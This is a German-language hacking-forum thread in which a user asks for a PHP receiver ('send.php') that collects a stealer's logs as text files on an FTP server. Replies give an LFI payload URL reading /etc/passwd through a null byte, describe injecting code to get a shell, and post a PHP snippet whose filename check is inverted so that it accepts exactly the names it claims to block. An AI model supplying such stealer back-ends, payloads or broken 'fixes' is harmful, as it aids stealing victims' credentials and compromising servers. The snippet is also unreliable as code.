Ergebnis 1 bis 5 von 5
  1. #1
    Eigener Benutzertitel Avatar von inmate
    Registriert seit
    23.12.2008
    Beiträge
    1.767

    Standard Send php [hilfe]

    Heyy Jungs.
    Ich suche jemanden der mir eine send.php für meinen stealer machen kann , da ich leider kp von php habe.
    Er solle eine text datei an den FTP senden.
    Danke schonmal

    mfG


    iPott <3

  2. #2
    Bad Times Virus
    Registriert seit
    14.03.2009
    Beiträge
    579

    Standard

    is das nich lfi injectable?
    http://www.seite.com/steal.php?file=.../etc/passwd%00 müsste doch funktionieren?
    Alos dass man sich da im prinzip seine shell reinschreibt?

  3. #3
    Anfänger
    Registriert seit
    02.05.2009
    Beiträge
    18

    Standard

    wie schaut es mit post aus? Da get ja weniger auf dem FTP speichert oder?

  4. #4
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    @wacked: So würde ich es jetzt nicht machen... Das Script öffnet die Datei ja zum schreiben und nicht zum lesen / ausführen. Aber ein Aufruf über Telnet oder ähnlich müsste gehen, wo dann per datei.php%00 das .txt umgangen wird. Somit könnte ein Code eingeschleust werden, der es ermöglicht eine Shell auf den Space zu bekommen...

    Wie wäre es so?

    Code:
    <?php
    
    $Datei = (preg_match("/php/",$_GET['file']) ? $_GET['file'] : "sorry_does_not_work"); 
    $Text = $_GET['file'];
    
    $FilePointer = fopen($Datei.".txt", "w");
    fwrite($FilePointer, $Text);
    fclose($FilePointer);
    
    ?>
    Per Preg-Match und einem regulären Ausdruck prüfen, ob "php" im Filenamen vorkommt. Wenn ja dann ist die Datei "sorry_does_not_work.txt", wenn nicht dann ist es der GET-Wert.

    @.cr4x: GET kann genauso viel übertragen. Nur wird die URL ziemlich lang, was doof ist. POST wäre natürlich auch eine Lösung. Nur kannst Du da genauso Fremdcode einschleusen, wie per GET. Und das mit der Länge... Bei Usernamen / Passwörtern macht das eigentlich nicht sooo viel Unterschied.
    Geändert von VeN0m (06.06.2009 um 15:31 Uhr)
    Come to the dark side - We have cookies

  5. #5
    W32.SwineFlu Avatar von Sirect
    Registriert seit
    24.07.2008
    Beiträge
    1.916

    Standard

    Es macht allgemein mehr Sinn eine vordefinierte Textdatei zu benutzen, da ich nicht davon ausgehe dass du täglich tausende Logs bekommen wirst =)

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •